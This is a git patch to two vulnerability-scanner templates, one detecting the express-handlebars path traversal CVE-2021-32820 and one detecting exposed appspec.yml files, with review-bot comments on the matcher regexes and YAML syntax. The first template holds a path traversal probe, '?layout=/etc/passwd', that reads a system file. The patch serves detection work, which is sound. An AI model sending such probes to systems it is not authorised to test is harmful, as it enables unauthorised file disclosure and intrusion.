From 7d727830903e68b911665dccddc57dbd8f3ddbc7 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Thu, 22 Jul 2021 16:32:37 +0530
Subject: [PATCH] WIP improvements

---
 cves/2021/CVE-2021-32820.yaml | 15 ++++++++++-----
 exposures/configs/appsec-yml-disclosure.yaml | 18 +++++++-----------
 2 files changed, 17 insertions(+), 16 deletions(-)

diff --git a/cves/2021/CVE-2021-32820.yaml b/cves/2021/CVE-2021-32820.yaml
index fd3af8498d..b8ba0eb246 100644
--- a/cves/2021/CVE-2021-32820.yaml
+++ b/cves/2021/CVE-2021-32820.yaml
@@ -4,21 +4,26 @@ info:
 name: Express-handlebars Path Traversal
 author: dhiyaneshDk
 severity: medium
- reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
- tags: cve,cve2021,express,lfi
+ reference: |
+ - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/
+ - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
+ tags: cve,cve2021,expressjs,lfi
 
 requests:
 - method: GET
 path:
 - "{{BaseURL}}/?layout=/etc/passwd"
+ matchers-condition: and
 matchers:
 - type: status
 status:
 - 200
+
 - type: regex
 regex:
- - "\\s*root:[x*]"
- - "\\s*daemon:[x*]"
- - "\\s*operator:[x*]:"
+ - "root:[x*]:0:0:"
+ - "daemon:[x*]:0:0:"
+ - "operator:[x*]:0:0:"
 part: body
+ condition: or
 
diff --git a/exposures/configs/appsec-yml-disclosure.yaml b/exposures/configs/appsec-yml-disclosure.yaml
index 56ce5522aa..291d27d117 100644
--- a/exposures/configs/appsec-yml-disclosure.yaml
+++ b/exposures/configs/appsec-yml-disclosure.yaml
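Review bot: Only the first of the three new regexes can realistically fire: on typical systems only the `root` entry carries uid/gid `0:0`, while `daemon` and `operator` have non-zero ids, so `daemon:[x*]:0:0:` and `operator:[x*]:0:0:` are effectively dead patterns and `condition: or` leaves the match resting on `root:[x*]:0:0:` alone. If the extra entries are meant as fallbacks, match the id fields loosely, e.g. `- "daemon:[x*]:[0-9]+:[0-9]+:"` and `- "operator:[x*]:[0-9]+:[0-9]+:"`. Separately, `reference: |` is a literal block scalar, so the two `- https://…` lines become one multi-line string rather than a YAML sequence; if the consumer expects a list, drop the `|` and write the items as a block sequence under `reference:`. The hunk begins at `name:`, so the template's `id:` and `info:` lines are above it.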
@@ -12,22 +12,18 @@ requests:
 path:
 - "{{BaseURL}}/appspec.yml"
 - "{{BaseURL}}/appspec.yaml"
+ matchers-condition: and
 matchers:
 - type: word
 words:
- - "\"version\""
- - "\"os\""
- - "\"files\""
- - "\"permissions\""
- - "\"hooks\""
- - "\"BeforeInstall\""
- - "\"ApplicationStart\""
+ - "version:"
+ - "os:"
+ - "files:"
+ - "source:"
 part: body
- - type: word
- words:
- - "application/yaml"
- part: header
+ condition: and
+
 - type: status
 status:
 - 200
 
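Review bot: The four new `words` are short substrings, and `os:` in particular also occurs inside tokens such as `videos:` or `macos:`, so a generic catch-all 200 page that happens to contain `version:`, `files:` and `source:` as well will still match despite `condition: and`. An AppSpec `files` entry pairs `source:` with `destination:`, so adding `- "destination:"` to the list (or anchoring the keys with a regex matcher such as `(?m)^os:`) would keep the body check tied to the AppSpec structure now that the `application/yaml` header matcher has been removed. The request's `method:` line sits above the hunk.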